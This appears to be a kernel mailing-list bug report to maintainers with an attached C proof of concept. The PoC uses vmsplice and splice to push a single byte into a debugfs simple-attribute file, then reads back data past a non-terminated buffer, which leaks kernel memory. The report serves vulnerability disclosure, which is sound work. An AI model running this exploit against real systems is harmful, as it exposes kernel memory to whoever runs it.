Hi Greg, Rafael, Arnd, > This report says it's uninit in strlen, but there's actually an > information leak later on that lets the user read arbitrary data past > the non-terminated attr->get_buf. The attached PoC demonstrates the problem. I am not sure how bad that is, given that /sys/kernel/debug is usually accessible only to root, and simple attribute files don't seem to be used anywhere else.
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

#define BUF_SIZE 128

/*
 * Reproducer attached to the report quoted above: delivers a single byte
 * to a debugfs "simple attribute" file through splice() instead of
 * write(), then reads the file back and prints whatever the read returned.
 *
 * None of pipe/mmap/vmsplice/open/splice/read are checked for failure.
 * debugfs is normally root-only, so as an unprivileged user open() fails,
 * dfs_fd is -1, the read fails, and the zeroed buffer is printed as ''.
 * The sequence vmsplice -> splice -> read is order-dependent; do not reorder.
 */
int main(int argc, char *argv[])
{
    char buf[BUF_SIZE];
    const char def_filename[] = "/sys/kernel/debug/bluetooth/6lowpan_enable";
    char *filename = (char *)def_filename;
    int pipefd[2], dfs_fd;
    struct iovec iov;

    /* An optional argv[1] overrides the default debugfs path. */
    if (argc > 1)
        filename = argv[1];

    pipe(pipefd);
    /* One anonymous page; the bare 3 is PROT_READ|PROT_WRITE. */
    iov.iov_base = mmap(NULL, 0x1000, 3, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
    iov.iov_len = 0x1;
    /* Move one byte of that page into the pipe (flags value 1 == SPLICE_F_MOVE). */
    vmsplice(pipefd[1], &iov, 1, 1);

    dfs_fd = open(filename, O_RDWR);
    /* Hand that single byte to the attribute file via the splice path. */
    splice(pipefd[0], 0, dfs_fd, 0, 0x1, SPLICE_F_NONBLOCK);

    /* Read the attribute back; buf is zeroed first so it is always NUL-terminated for printf. */
    memset(buf, 0, BUF_SIZE);
    read(dfs_fd, buf, BUF_SIZE);
    printf("'%s'\n", buf);
    return 0;
}